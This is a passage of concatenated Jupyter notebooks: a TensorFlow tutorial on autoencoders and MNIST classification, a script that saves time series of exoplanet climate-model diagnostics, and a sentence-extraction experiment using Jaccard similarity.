encapsulate our variables # This will simply prefix all the variables made in this scope # with the name we give it. with tf.variable_scope("encoder/layer/{}".format(layer_i)): # we'll keep track of the shapes of each layer # As we'll need these for the decoder shapes.append(current_input.get_shape().as_list()) # Create a weight matrix which will increasingly reduce # down the amount of information in the input by performing # a matrix multiplication W = tf.get_variable( name='W', shape=[ filter_sizes[layer_i], filter_sizes[layer_i], n_input, n_output], initializer=tf.random_normal_initializer(mean=0.0, stddev=0.02)) # Now we'll convolve our input by our newly created W matrix h = tf.nn.conv2d(current_input, W, strides=[1, 2, 2, 1], padding='SAME') # And then use a relu activation function on its output current_input = tf.nn.relu(h) # Finally we'll store the weight matrix so we can build the decoder. Ws.append(W) # We'll also replace n_input with the current n_output, so that on the # next iteration, our new number inputs will be correct. n_input = n_output ``` Now with our convolutional encoder built and the encoding weights stored, we'll reverse the whole process to decode everything back out to the original image. ``` # We'll first reverse the order of our weight matrices Ws.reverse() # and the shapes of each layer shapes.reverse() # and the number of filters (which is the same but could have been different) n_filters.reverse() # and append the last filter size which is our input image's number of channels n_filters = n_filters[1:] + [1] print(n_filters, filter_sizes, shapes) # and then loop through our convolution filters and get back our input image # we'll enumerate the shapes list to get us there for layer_i, shape in enumerate(shapes): # we'll use a variable scope to help encapsulate our variables # This will simply prefix all the variables made in this scope # with the name we give it. with tf.variable_scope("decoder/layer/{}".format(layer_i)): # Create a weight matrix which will increasingly reduce # down the amount of information in the input by performing # a matrix multiplication W = Ws[layer_i] # Now we'll convolve by the transpose of our previous convolution tensor h = tf.nn.conv2d_transpose(current_input, W, tf.pack([tf.shape(X)[0], shape[1], shape[2], shape[3]]), strides=[1, 2, 2, 1], padding='SAME') # And then use a relu activation function on its output current_input = tf.nn.relu(h) ``` Now we have the reconstruction through the network: ``` Y = current_input Y = tf.reshape(Y, [-1, n_features]) ``` We can measure the cost and train exactly like before with the fully connected network: ``` cost = tf.reduce_mean(tf.reduce_mean(tf.squared_difference(X, Y), 1)) learning_rate = 0.001 # pass learning rate and cost to optimize optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost) # Session to manage vars/train sess = tf.Session() sess.run(tf.initialize_all_variables()) # Some parameters for training batch_size = 100 n_epochs = 5 # We'll try to reconstruct the same first 100 images and show how # The network does over the course of training. examples = ds.X[:100] # We'll store the reconstructions in a list imgs = [] fig, ax = plt.subplots(1, 1) for epoch_i in range(n_epochs): for batch_X, _ in ds.train.next_batch(): sess.run(optimizer, feed_dict={X: batch_X - mean_img}) recon = sess.run(Y, feed_dict={X: examples - mean_img}) recon = np.clip((recon + mean_img).reshape((-1, 28, 28)), 0, 255) img_i = montage(recon).astype(np.uint8) imgs.append(img_i) ax.imshow(img_i, cmap='gray') fig.canvas.draw() print(epoch_i, sess.run(cost, feed_dict={X: batch_X - mean_img})) gif.build_gif(imgs, saveto='conv-ae.gif', cmap='gray') ipyd.Image(url='conv-ae.gif?{}'.format(np.random.rand()), height=500, width=500) ``` <a name="denoising-autoencoder"></a> ## Denoising Autoencoder The denoising autoencoder is a very simple extension to an autoencoder. Instead of seeing the input, it is corrupted, for instance by masked noise. but the reconstruction loss is still measured on the original uncorrupted image. What this does is lets the model try to interpret occluded or missing parts of the thing it is reasoning about. It would make sense for many models, that not every datapoint in an input is necessary to understand what is going on. Denoising autoencoders try to enforce that, and as a result, the encodings at the middle most layer are often far more representative of the actual classes of different objects. In the resources section, you'll see that I've included a general framework autoencoder allowing you to use either a fully connected or convolutional autoencoder, and whether or not to include denoising. If you interested in the mechanics of how this works, I encourage you to have a look at the code. <a name="variational-autoencoders"></a> ## Variational Autoencoders A variational autoencoder extends the traditional autoencoder by using an additional layer called the variational layer. It is actually two networks that are cleverly connected using a simple reparameterization trick, to help the gradient flow through both networks during backpropagation allowing both to be optimized. We dont' have enough time to get into the details, but I'll try to quickly explain: it tries to optimize the likelihood that a particular distribution would create an image, rather than trying to optimize simply the L2 loss at the end of the network. Or put another way it hopes that there is some distribution that a distribution of image encodings could be defined as. This is a bit tricky to grasp, so don't worry if you don't understand the details. The major difference to hone in on is that instead of optimizing distance in the input space of pixel to pixel distance, which is actually quite arbitrary if you think about it... why would we care about the exact pixels being the same? Human vision would not care for most cases, if there was a slight translation of our image, then the distance could be very high, but we would never be able to tell the difference. So intuitively, measuring error based on raw pixel to pixel distance is not such a great approach. Instead of relying on raw pixel differences, the variational autoencoder tries to optimize two networks. One which says that given my pixels, I am pretty sure I can encode them to the parameters of some well known distribution, like a set of Gaussians, instead of some artbitrary density of values. And then I can optimize the latent space, by saying that particular distribution should be able to represent my entire dataset, and I try to optimize the likelihood that it will create the images I feed through a network. So distance is somehow encoded in this latent space. Of course I appreciate that is a difficult concept so forgive me for not being able to expand on it in more details. But to make up for the lack of time and explanation, I've included this model under the resources section for you to play with! Just like the "vanilla" autoencoder, this one supports both fully connected, convolutional, and denoising models. This model performs so much better than the vanilla autoencoder. In fact, it performs so well that I can even manage to encode the majority of MNIST into 2 values. The following visualization demonstrates the learning of a variational autoencoder over time. <mnist visualization> There are of course a lot more interesting applications of such a model. You could for instance, try encoding a more interesting dataset, such as CIFAR which you'll find a wrapper for in the libs/datasets module. <TODO: produce GIF visualization madness> Or the celeb faces dataset: <celeb dataset> Or you could try encoding an entire movie. We tried it with the copyleft movie, "Sita Sings The Blues". Every 2 seconds, we stored an image of this movie, and then fed all of these images to a deep variational autoencoder. This is the result. <show sita sings the blues training images> And I'm sure we can get closer with deeper nets and more train time. But notice how in both celeb faces and sita sings the blues, the decoding is really blurred. That is because of the assumption of the underlying representational space. We're saying the latent space must be modeled as a gaussian, and those factors must be distributed as a gaussian. This enforces a sort of discretization of my representation, enforced by the noise parameter of the gaussian. In the last session, we'll see how we can avoid this sort of blurred representation and get even better decodings using a generative adversarial network. For now, consider the applications that this method opens up. Once you have an encoding of a movie, or image dataset, you are able to do some very interesting things. You have effectively stored all the representations of that movie, although its not perfect of course. But, you could for instance, see how another movie would be interpretted by the same network. That's similar to what Terrance Broad did for his project on reconstructing blade runner and a scanner darkly, though he made use of both the variational autoencoder and the generative adversarial network. We're going to look at that network in more detail in the last session. We'll also look at how to properly handle very large datasets like celeb faces or the one used here to create the sita sings the blues autoencoder. Taking every 60th frame of Sita Sings The Blues gives you aobut 300k images. And that's a lot of data to try and load in all at once. We had to size it down considerably, and make use of what's called a tensorflow input pipeline. I've included all the code for training this network, which took about 1 day on a fairly powerful machine, but I will not get into the details of the image pipeline bits until session 5 when we look at generative adversarial networks. I'm delaying this because we'll need to learn a few things along the way before we can build such a network. <a name="predicting-image-labels"></a> # Predicting Image Labels We've just seen a variety of types of autoencoders and how they are capable of compressing information down to its inner most layer while still being able to retain most of the interesting details. Considering that the CelebNet dataset was nearly 200 thousand images of 64 x 64 x 3 pixels, and we're able to express those with just an inner layer of 50 values, that's just magic basically. Magic. Okay, let's move on now to a different type of learning often called supervised learning. Unlike what we just did, which is work with a set of data and not have any idea what that data should be *labeled* as, we're going to explicitly tell the network what we want it to be labeled by saying what the network should output for a given input. In the previous cause, we just had a set of `Xs`, our images. Now, we're going to have `Xs` and `Ys` given to us, and use the `Xs` to try and output the `Ys`. With MNIST, the outputs of each image are simply what numbers are drawn in the input image. The wrapper for grabbing this dataset from the libs module takes an additional parameter which I didn't talk about called `one_hot`. ``` from libs import datasets # ds = datasets.MNIST(one_hot=True) ``` To see what this is doing, let's compare setting it to false versus true: ``` ds = datasets.MNIST(one_hot=False) # let's look at the first label print(ds.Y[0]) # okay and what does the input look like plt.imshow(np.reshape(ds.X[0], (28, 28)), cmap='gray') # great it is just the label of the image plt.figure() # Let's look at the next one just to be sure print(ds.Y[1]) # Yea the same idea plt.imshow(np.reshape(ds.X[1], (28, 28)), cmap='gray') ``` And now let's look at what the one hot version looks like: ``` ds = datasets.MNIST(one_hot=True) plt.figure() plt.imshow(np.reshape(ds.X[0], (28, 28)), cmap='gray') print(ds.Y[0]) # array([ 0., 0., 0., 0., 0., 0., 0., 1., 0., 0.]) # Woah a bunch more numbers. 10 to be exact, which is also the number # of different labels in the dataset. plt.imshow(np.reshape(ds.X[1], (28, 28)), cmap='gray') print(ds.Y[1]) # array([ 0., 0., 0., 1., 0., 0., 0., 0., 0., 0.]) ``` So instead of have a number from 0-9, we have 10 numbers corresponding to the digits, 0-9, and each value is either 0 or 1. Whichever digit the image represents is the one that is 1. To summarize, we have all of the images of the dataset stored as: `n_observations` x `n_features` tensor (n-dim array) ``` print(ds.X.shape) ``` And labels stored as `n_observations` x `n_labels` where each observation is a one-hot vector, where only one element is 1 indicating which class or label it is. ``` print(ds.Y.shape) print(ds.Y[0]) ``` <a name="one-hot-encoding"></a> ## One-Hot Encoding Remember in the last session, we saw how to build a network capable of taking 2 inputs representing the row and column of an image, and predicting 3 outputs, the red, green, and blue colors. Just like in our unsupervised model, instead of having 2 inputs, we'll now have 784 inputs, the brightness of every pixel in our image. And instead of 3 outputs, like in our painting network from last session, or the 784 outputs we had in our unsupervised MNIST network, we'll now have 10 outputs representing the one-hot encoding of its label. So why don't we just have 1 output? A number from 0-9? Wouldn't having 10 different outputs instead of just 1 be harder to learn? Consider how we normally train the network. We have to give it a cost which it will use to minimize. What could our cost be if our output was just a single number, 0-9? We would still have the true label, and the predicted label. Could we just take the subtraction of the two values? e.g. the network predicted 0, but the image was really the number 8. Okay so then our distance could be: ``` # cost = tf.reduce_sum(tf.abs(y_pred - y_true)) ``` But in this example, the cost would be 8. If the image was a 4, and the network predicted a 0 again, the cost would be 4... but isn't the network still just as wrong, not half as much as when the image was an 8? In a one-hot encoding, the cost would be 1 for both, meaning they are both just as wrong. So we're able to better measure the cost, by separating each class's label into its own dimension. <a name="using-regression-for-classification"></a> ## Using Regression for Classification The network we build will be trained to output values between 0 and 1. They won't output exactly a 0 or 1. But rather, they are able to produce any value. 0, 0.1, 0.2, ... and that means the networks we've been using are actually performing regression. In regression, the output is "continuous", rather than "discrete". The difference is this: a *discrete* output means the network can only output one of a few things. Like, 0, 1, 2, or 3, and that's it. But a *continuous* output means it can output any real number. In order to perform what's called classification, we're just simply going to look at whichever value is the highest in our one hot encoding. In order to do that a little better, we're actually going interpret our one hot encodings as probabilities by scaling the total output by their sum. What this does is allows us to understand that as we grow more confident in one prediction, we should grow less confident in all other predictions. We only have so much certainty to go around, enough to add up to 1. If we think the image might also be the number 1, then we lose some certainty of it being the number 0. It turns out there is a better cost function that simply measuring the distance between two vectors when they are probabilities. It's called cross entropy: \begin{align} \Large{H(x) = -\sum{y_{\text{t}}(x) * \log(y_{\text{p}}(x))}} \end{align} What this equation does is measures the similarity of our prediction with our true distribution, by exponentially increasing error whenever our prediction gets closer to 1 when it should be 0, and similarly by exponentially increasing error whenever our prediction gets closer to 0, when it should be 1. I won't go into more detail here, but just know that we'll be using this measure instead of a normal distance measure. <a name="fully-connected-network"></a> ## Fully Connected Network ### Defining the Network Let's see how our one hot encoding and our new cost function will come into play. We'll create our network for predicting image classes in pretty much the same way we've created previous networks: We will have as input to the network 28 x 28 values. ``` import tensorflow as tf from libs import datasets ds = datasets.MNIST(split=[0.8, 0.1, 0.1]) n_input = 28 * 28 ``` As output, we have our 10 one-hot-encoding values ``` n_output = 10 ``` We're going to create placeholders for our tensorflow graph. We're going to set the first dimension to `None`. Remember from our unsupervised model, this is just something special for placeholders which tells tensorflow "let this dimension be any possible value". 1, 5, 100, 1000, it doesn't matter. Since we're going to pass our entire dataset in batches we'll need this to be say 100 images at a time. But we'd also like to be able to send in only 1 image and see what the prediction of the network is. That's why we let this dimension be flexible. ``` X = tf.placeholder(tf.float32, [None, n_input]) ``` For the output, we'll have `None` again, since for every input, we'll have the same number of images that have outputs. ``` Y = tf.placeholder(tf.float32, [None, n_output]) ``` Now we'll connect our input to the output with a linear layer. Instead of `relu`, we're going to use `softmax`. This will perform our exponential scaling of the outputs and make sure the output sums to 1, making it a probability. ``` # We'll use the linear layer we created in the last session, which I've stored in the libs file: # NOTE: The lecture used an older version of this function which had a slightly different definition. from libs import utils Y_pred, W = utils.linear( x=X, n_output=n_output, activation=tf.nn.softmax, name='layer1') ``` And then we write our loss function as the cross entropy. And then we'll give our optimizer the `cross_entropy` measure just like we would with GradientDescent. The formula for cross entropy is: \begin{align} \Large{H(x) = -\sum{\text{Y}_{\text{true}} * log(\text{Y}_{pred})}} \end{align} ``` # We add 1e-12 because the log is undefined at 0. cross_entropy = -tf.reduce_sum(Y * tf.log(Y_pred + 1e-12)) optimizer = tf.train.AdamOptimizer(0.001).minimize(cross_entropy) ``` To determine the correct class from our regression output, we have to take the maximum index. ``` predicted_y = tf.argmax(Y_pred, 1) actual_y = tf.argmax(Y, 1) ``` We can then measure the accuracy by seeing whenever these are equal. Note, this is just for us to see, and is not at all used to "train" the network! ``` correct_prediction = tf.equal(predicted_y, actual_y) accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float")) ``` ### Training the Network The rest of the code will be exactly the same as before. We chunk the training dataset into `batch_size` chunks, and let these images help train the network over a number of iterations. ``` sess = tf.Session() sess.run(tf.initialize_all_variables()) # Now actually do some training: batch_size = 50 n_epochs = 5 for epoch_i in range(n_epochs): for batch_xs, batch_ys in ds.train.next_batch(): sess.run(optimizer, feed_dict={ X: batch_xs, Y: batch_ys }) valid = ds.valid print(sess.run(accuracy, feed_dict={ X: valid.images, Y: valid.labels })) # Print final test accuracy: test = ds.test print(sess.run(accuracy, feed_dict={ X: test.images, Y: test.labels })) ``` What we should see is the accuracy being printed after each "epoch", or after every run over the entire dataset. Since we're using batches, we use the notion of an "epoch" to denote whenever we've gone through the entire dataset. <a name="inspecting-the-network"></a> ### Inspecting the Trained Network Let's try and now inspect *how* the network is accomplishing this task. We know that our network is a single matrix multiplication of our 784 pixel values. The weight matrix, `W`, should therefore have 784 rows. As outputs, it has 10 values. So the matrix is composed in the `linear` function as `n_input` x `n_output` values. So the matrix is 784 rows x 10 columns. <TODO: graphic w/ wacom showing network and matrix multiplication and pulling out single neuron/column> In order to get this matrix, we could have had our `linear` function return the `tf.Tensor`. But since everything is part of the tensorflow graph, and we've started using nice names for all of our operations, we can actually find this tensor using tensorflow: ``` # We first get the graph that we used to compute the network g = tf.get_default_graph() # And can inspect everything inside of it [op.name for op in g.get_operations()] ``` Looking at the names of the operations, we see there is one `linear/W`. But this is the `tf.Operation`. Not the `tf.Tensor`. The tensor is the result of the operation. To get the result of the operation, we simply add ":0" to the name of the operation: ``` W = g.get_tensor_by_name('layer1/W:0') ``` We can use the existing session to compute the current value of this tensor: ``` W_arr = np.array(W.eval(session=sess)) print(W_arr.shape) ``` And now we have our tensor! Let's try visualizing every neuron, or every column of this matrix: ``` fig, ax = plt.subplots(1, 10, figsize=(20, 3)) for col_i in range(10): ax[col_i].imshow(W_arr[:, col_i].reshape((28, 28)), cmap='coolwarm') ``` We're going to use the `coolwarm` color map, which will use "cool" values, or blue-ish colors for low values. And "warm" colors, red, basically, for high values. So what we begin to see is that there is a weighting of all the input values, where pixels that are likely to describe that number are being weighted high, and pixels that are not likely to describe that number are being weighted low. By summing all of these multiplications together, the network is able to begin to predict what number is in the image. This is not a very good network though, and the representations it learns could still do a much better job. We were only right about 93% of the time according to our accuracy. State of the art models will get about 99.9% accuracy. <a name="convolutional-networks"></a> ## Convolutional Networks To get better performance, we can build a convolutional network. We've already seen how to create a convolutional network with our unsupervised model. We're going to make the same modifications here to help us predict the digit labels in MNIST. ### Defining the Network I'll first reset the current graph, so we can build a new one. We'll use tensorflow's nice helper function for doing this. ``` from tensorflow.python.framework.ops import reset_default_graph reset_default_graph() ``` And just to confirm, let's see what's in our graph: ``` # We first get the graph that we used to compute the network g = tf.get_default_graph() # And can inspect everything inside of it [op.name for op in g.get_operations()] ``` Great. Empty. Now let's get our dataset, and create some placeholders like before: ``` # We'll have placeholders just like before which we'll fill in later. ds = datasets.MNIST(one_hot=True, split=[0.8, 0.1, 0.1]) X = tf.placeholder(tf.float32, [None, 784]) Y = tf.placeholder(tf.float32, [None, 10]) ``` Since `X` is currently `[batch, height*width]`, we need to reshape to a 4-D tensor to use it in a convolutional graph. Remember, in order to perform convolution, we have to use 4-dimensional tensors describing the: `N x H x W x C` We'll reshape our input placeholder by telling the `shape` parameter to be these new dimensions and we'll use `-1` to denote this dimension should not change size. ``` X_tensor = tf.reshape(X, [-1, 28, 28, 1]) ``` We'll now setup the first convolutional layer. Remember that the weight matrix for convolution should be `[height x width x input_channels x output_channels]` Let's create 32 filters. That means every location in the image, depending on the stride I set when we perform the convolution, will be filtered by this many different kernels. In session 1, we convolved our image with just 2 different types of kernels. Now, we're going to let the computer try to find out what 32 filters helps it map the input to our desired output via our training signal. ``` filter_size = 5 n_filters_in = 1 n_filters_out = 32 W_1 = tf.get_variable( name='W', shape=[filter_size, filter_size, n_filters_in, n_filters_out], initializer=tf.random_normal_initializer()) ``` Bias is always `[output_channels]` in size. ``` b_1 = tf.get_variable( name='b', shape=[n_filters_out], initializer=tf.constant_initializer()) ``` Now we can build a graph which does the first layer of convolution: We define our stride as `batch` x `height` x `width` x `channels`. This has the effect of resampling the image down to half of the size. ``` h_1 = tf.nn.relu( tf.nn.bias_add( tf.nn.conv2d(input=X_tensor, filter=W_1, strides=[1, 2, 2, 1], padding='SAME'), b_1)) ``` And just like the first layer, add additional layers to create a deep net. ``` n_filters_in = 32 n_filters_out = 64 W_2 = tf.get_variable( name='W2', shape=[filter_size, filter_size, n_filters_in, n_filters_out], initializer=tf.random_normal_initializer()) b_2 = tf.get_variable( name='b2', shape=[n_filters_out], initializer=tf.constant_initializer()) h_2 = tf.nn.relu( tf.nn.bias_add( tf.nn.conv2d(input=h_1, filter=W_2, strides=[1, 2, 2, 1], padding='SAME'), b_2)) ``` 4d -> 2d ``` # We'll now reshape so we can connect to a fully-connected/linear layer: h_2_flat = tf.reshape(h_2, [-1, 7 * 7 * n_filters_out]) ``` Create a fully-connected layer: ``` # NOTE: This uses a slightly different version of the linear function than the lecture! h_3, W = utils.linear(h_2_flat, 128, activation=tf.nn.relu, name='fc_1') ``` And one last fully-connected layer which will give us the correct number of outputs, and use a softmax to expoentially scale the outputs and convert them to a probability: ``` # NOTE: This uses a slightly different version of the linear function than the lecture! Y_pred, W = utils.linear(h_3, n_output, activation=tf.nn.softmax, name='fc_2') ``` <TODO: Draw as graphical representation> ### Training the Network The rest of the training process is the same as the previous network. We'll define loss/eval/training functions: ``` cross_entropy = -tf.reduce_sum(Y * tf.log(Y_pred + 1e-12)) optimizer = tf.train.AdamOptimizer().minimize(cross_entropy) ``` Monitor accuracy: ``` correct_prediction = tf.equal(tf.argmax(Y_pred, 1), tf.argmax(Y, 1)) accuracy = tf.reduce_mean(tf.cast(correct_prediction, 'float')) ``` And create a new session to actually perform the initialization of all the variables: ``` sess = tf.Session() sess.run(tf.initialize_all_variables()) ``` Then we'll train in minibatches and report accuracy: ``` batch_size = 50 n_epochs = 10 for epoch_i in range(n_epochs): for batch_xs, batch_ys in ds.train.next_batch(): sess.run(optimizer, feed_dict={ X: batch_xs, Y: batch_ys }) valid = ds.valid print(sess.run(accuracy, feed_dict={ X: valid.images, Y: valid.labels })) # Print final test accuracy: test = ds.test print(sess.run(accuracy, feed_dict={ X: test.images, Y: test.labels })) ``` <TODO: Fun timelapse of waiting> ### Inspecting the Trained Network Let's take a look at the kernels we've learned using the following montage function, similar to the one we've been using for creating image montages, except this one is suited for the dimensions of convolution kernels instead of 4-d images. So it has the height and width first, unlike images which have batch then height then width. We'll use this function to visualize every convolution kernel in the first and second layers of our network. ``` from libs.utils import montage_filters W1 = sess.run(W_1) plt.figure(figsize=(10, 10)) plt.imshow(montage_filters(W1), cmap='coolwarm', interpolation='nearest') ``` What we're looking at are all of the convolution kernels that have been learned. Compared to the previous network we've learned, it is much harder to understand what's happening here. But let's try and explain these a little more. The kernels that have been automatically learned here are responding to edges of different scales, orientations, and rotations. It's likely these are really describing parts of letters, or the strokes that make up letters. Put another way, they are trying to get at the "information" in the image by seeing what changes. That's a pretty fundamental idea. That information would be things that change. Of course, there are filters for things that aren't changing as well. Some filters may even seem to respond to things that are mostly constant. However, if our network has learned a lot of filters that look like that, it's likely that the network hasn't really learned anything at all. The flip side of this is if the filters all look more or less random. That's also a bad sign. Let's try looking at the second layer's kernels: ``` W2 = sess.run(W_2) plt.imshow(montage_filters(W2 / np.max(W2)), cmap='coolwarm') ``` It's really difficult to know what's happening here. There are many more kernels in this layer. They've already passed through a set of filters and an additional non-linearity. How can we really know what the network is doing to learn its objective function? The important thing for now is to see that most of these filters are different, and that they are not all constant or uniformly activated. That means it's really doing something, but we aren't really sure yet how to see how that effects the way we think of and perceive the image. In the next session, we'll learn more about how we can start to interrogate these deeper representations and try to understand what they are encoding. Along the way, we'll learn some pretty amazing tricks for producing entirely new aesthetics that eventually led to the "deep dream" viral craze. <a name="savingloading-models"></a> # Saving/Loading Models Tensorflow provides a few ways of saving/loading models. The easiest way is to use a checkpoint. Though, this really useful while you are training your network. When you are ready to deploy or hand out your network to others, you don't want to pass checkpoints around as they contain a lot of unnecessary information, and it also requires you to still write code to create your network. Instead, you can create a protobuf which contains the definition of your graph and the model's weights. Let's see how to do both: <a name="checkpoint"></a> ## Checkpoint Creating a checkpoint requires you to have already created a set of operations in your tensorflow graph. Once you've done this, you'll create a session like normal and initialize all of the variables. After this, you create a `tf.train.Saver` which can restore a previously saved checkpoint, overwriting all of the variables with your saved parameters. ``` import os sess = tf.Session() init_op = tf.initialize_all_variables() saver = tf.train.Saver() sess.run(init_op) if os.path.exists("model.ckpt"): saver.restore(sess, "model.ckpt") print("Model restored.") ``` Creating the checkpoint is easy. After a few iterations of training, depending on your application say between 1/10 of the time to train the full model, you'll want to write the saved model. You can do this like so: ``` save_path = saver.save(sess, "./model.ckpt") print("Model saved in file: %s" % save_path) ``` <a name="protobuf"></a> ## Protobuf The second way of saving a model is really useful for when you don't want to pass around the code for producing the tensors or computational graph itself. It is also useful for moving the code to deployment or for use in the C++ version of Tensorflow. To do this, you'll want to run an operation to convert all of your trained parameters into constants. Then, you'll create a second graph which copies the necessary tensors, extracts the subgraph, and writes this to a model. The summarized code below shows you how you could use a checkpoint to restore your models parameters, and then export the saved model as a protobuf. ``` path='./' ckpt_name = 'model.ckpt' fname = 'model.tfmodel' dst_nodes = ['Y'] g_1 = tf.Graph() with tf.Session(graph=g_1) as sess: x = tf.placeholder(tf.float32, shape=(1, 224, 224, 3)) # Replace this with some code which will create your tensorflow graph: net = create_network() sess.run(tf.initialize_all_variables()) saver.restore(sess, ckpt_name) graph_def = tf.python.graph_util.convert_variables_to_constants( sess, sess.graph_def, dst_nodes) g_2 = tf.Graph() with tf.Session(graph=g_2) as sess: tf.train.write_graph( tf.python.graph_util.extract_sub_graph( graph_def, dst_nodes), path, fname, as_text=False) ``` When you wanted to import this model, now you wouldn't need to refer to the checkpoint or create the network by specifying its placeholders or operations. Instead, you'd use the `import_graph_def` operation like so: ``` with open("model.tfmodel", mode='rb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) tf.import_graph_def(net['graph_def'], name='model') ``` <a name="wrap-up"></a> # Wrap Up In the next session, we'll learn some very powerful techniques for exploring the representations learned by these kernels, and how we can better understand what they are learning. We'll look at state of the art deep networks for image recognition and interrogate what they've learned using techniques that led the public to Deep Dream. <a name="reading"></a> # Reading Bourlard, H.; Kamp, Y. (1988). "Auto-association by multilayer perceptrons and singular value decomposition". Biological Cybernetics 59 (4–5): 291–294. G. E. Hinton, R. R. Salakhutdinov. Reducing the Dimensionality of Data with Neural Networks. Science, 28 Jul 2006. Vol. 313, Issue 5786, pp. 504-507. DOI: 10.1126/science.1127647. http://science.sciencemag.org/content/313/5786/504.abstract Bengio, Y. (2009). "Learning Deep Architectures for AI". Foundations and Trends in Machine Learning 2. doi:10.1561/2200000006 Vincent, Pascal; Larochelle, Hugo; Lajoie, Isabelle; Bengio, Yoshua; Manzagol, Pierre-Antoine (2010). "Stacked Denoising Autoencoders: Learning Useful Representations in a Deep Network with a Local Denoising Criterion". The Journal of Machine Learning Research 11: 3371–3408. Auto-Encoding Variational Bayes, Kingma, D.P. and Welling, M., ArXiv e-prints, 2013 http://arxiv.org/abs/1312.6114
github_jupyter
# Save time series of spatially collapsed diagnostics ``` import warnings warnings.filterwarnings("ignore") # noqa # Data analysis and viz libraries import dask import numpy as np import xarray as xr from dask.distributed import Client # Progress bar from tqdm.notebook import tqdm # Local modules import mypaths import names from calc import ( altitude_of_cloud_mmr_maximum, cloud_path_total, dayside_mean, get_time_rel_days, global_mean, meridional_mean, nightside_mean, open_ocean_frac, sfc_temp, spatial_mean, terminator_mean, ) from commons import MODELS from load_thai import LOAD_CONF from model_exocam import calc_alt_exocam, calc_pres_exocam from model_lmdg import calc_alt_lmdg ``` Start a local `dask` cluster. ``` client = Client(processes=True, n_workers=4, threads_per_worker=1) client ``` ## Choose case ``` THAI_case = "Hab2" if THAI_case.endswith("1"): import const_ben1_hab1 as const else: import const_ben2_hab2 as const KW_CONST = dict( mw_ratio=const.mw_ratio, dry_air_gas_constant=const.rgas, condens_gas_constant=const.rvapor, gravity=const.gplanet, ) AGGR_DICT = dict(g=global_mean, d=dayside_mean, n=nightside_mean, t=terminator_mean) DIAGS = { "t_sfc": { "func": sfc_temp, }, "ocean_frac": { "func": open_ocean_frac, }, "cwp": { "func": cloud_path_total, }, "alt_cld_mmr_max": { "func": altitude_of_cloud_mmr_maximum, }, } for model_key in tqdm(MODELS.keys()): model_names = getattr(names, model_key.lower()) with LOAD_CONF[model_key]["loader"](THAI_case) as ds: if model_key == "ExoCAM": ds[model_names.pres] = calc_pres_exocam(ds) ds["z"] = calc_alt_exocam(ds, case=THAI_case, **KW_CONST) elif model_key == "LMDG": ds["level_height"] = calc_alt_lmdg(ds, case=THAI_case, **KW_CONST) ds_out = {} for diag_key, diag_dict in tqdm(DIAGS.items(), leave=False): if diag_key == "t_sfc": args = (ds, model_key, const) else: args = (ds, model_key) _arr = diag_dict["func"](*args) for aggr_key, aggr_func in tqdm(AGGR_DICT.items(), leave=False): ds_out[f"{diag_key}_{aggr_key}"] = ( aggr_func(_arr, model_names).sortby(model_names.t).compute() ) xr.Dataset(ds_out).to_netcdf( mypaths.datadir / model_key / f"{THAI_case}_time_series_{model_key}.nc" ) client.close() ```
github_jupyter
# Extract relevant sentences In this notebook a method is constructed to extract relevant sentences from a given text and the corresponding abstract. For this method, a score of similarity between sentences would be useful. The Jaccard index is used on top of a BOW (Bag-of-Words) model of a sentence. The Jaccard index is defined as follows on two sets $A$ and $B$: $J(A, B) = \frac{|A \cap B|}{|A \cup B|}$ It is a score between $0$ and $1$ and is $1$ if all elements of $A$ are equal to all elements of $B$. The score equals $0$ if every element of $A$ differs from any element of $B$. Therefore, it is a measure for overlap. It is important to keep the sentence comparison as fast as possible, since it is used on every training document. ``` import sys sys.path.append('..') import nltk import unidecode import re from utils import compute_jaccard_index import numpy as np ``` In the next cell, a few examples are defined. One of the examples is a sentence in a different order and one of the examples is completely different from the original. ``` examples = [ ('This is a test sentence.', 'This sentence is a test.'), ('This is a Jupyter Notebook.', 'All dogs are animals.') ] ``` The overlap scores for each of the examples are computed in the next cell. The `clean_word` method removes accents and non-alphabetic characters. By doing so, punctiation symbols are removed from the Bag-of-Words which is desired. Otherwise, most of the scores are non-zero for completely different sentences. ``` clean_word = lambda word: re.sub(r'[^a-z]+', '', unidecode.unidecode(word).lower()) for sentence1, sentence2 in examples: print('Comparing "%s" to "%s":' % (sentence1, sentence2)) words1 = {clean_word(word) for word in nltk.word_tokenize(sentence1) if len(clean_word(word)) > 0} words2 = {clean_word(word) for word in nltk.word_tokenize(sentence2) if len(clean_word(word)) > 0} jaccard_index = compute_jaccard_index(words1, words2) print('- Unique words in first sentence: %s' % words1) print('- Unique words in second sentence: %s' % words2) print('- Jaccard index: %.2f' % jaccard_index) print() ``` Now this approach is tested on a real-world example consisting of both an abstract and the full text. ``` text = """The domestic dog (Canis lupus familiaris or Canis familiaris) is a member of the genus Canis (canines), which forms part of the wolf-like canids, and is the most widely abundant terrestrial carnivore. The dog and the extant gray wolf are sister taxa as modern wolves are not closely related to the wolves that were first domesticated, which implies that the direct ancestor of the dog is extinct. The dog was the first species to be domesticated and has been selectively bred over millennia for various behaviors, sensory capabilities, and physical attributes. Their long association with humans has led dogs to be uniquely attuned to human behavior and they are able to thrive on a starch-rich diet that would be inadequate for other canid species. New research seems to show that dogs have mutations to equivalent genetic regions in humans where changes are known to trigger high sociability and somewhat reduced intelligence. Dogs vary widely in shape, size and colors. Dogs perform many roles for people, such as hunting, herding, pulling loads, protection, assisting police and military, companionship and, more recently, aiding handicapped individuals and therapeutic roles. This influence on human society has given them the sobriquet "man's best friend".""" abstract = """The dog was the first species to be domesticated. Dogs vary widely in shape, size and colors.""" print('Text:') print('-' * 80) print(text) print('-' * 80) print() print('Abstract:') print('-' * 80) print(abstract) print('-' * 80) for sentence1 in nltk.sent_tokenize(abstract): scores = [] text_sentences = nltk.sent_tokenize(text) for sentence2 in text_sentences: words1 = {clean_word(word) for word in nltk.word_tokenize(sentence1) if len(clean_word(word)) > 0} words2 = {clean_word(word) for word in nltk.word_tokenize(sentence2) if len(clean_word(word)) > 0} scores.append(compute_jaccard_index(words1, words2)) related_indices = set() if np.max(scores) > 0.: related_indices.add(np.argmax(scores)) for index, score in enumerate(scores): if score > 0.6: related_indices.add(index) print('Sentence in abstract: "%s"' % sentence1) print('-' * 80) for index in related_indices: print('Related sentence in text: "%s"' % text_sentences[index]) print('-' * 80) print() ``` There is not a straightforward algorithm to compute relatedness between two sentences. But this is a greedy approach which is required for fast preprocessing. It might introduce some amount of noise. Now lets test it on a different example. ``` text = """While architects have publicly proclaimed the World Trade Center site proposals displayed at the Winter 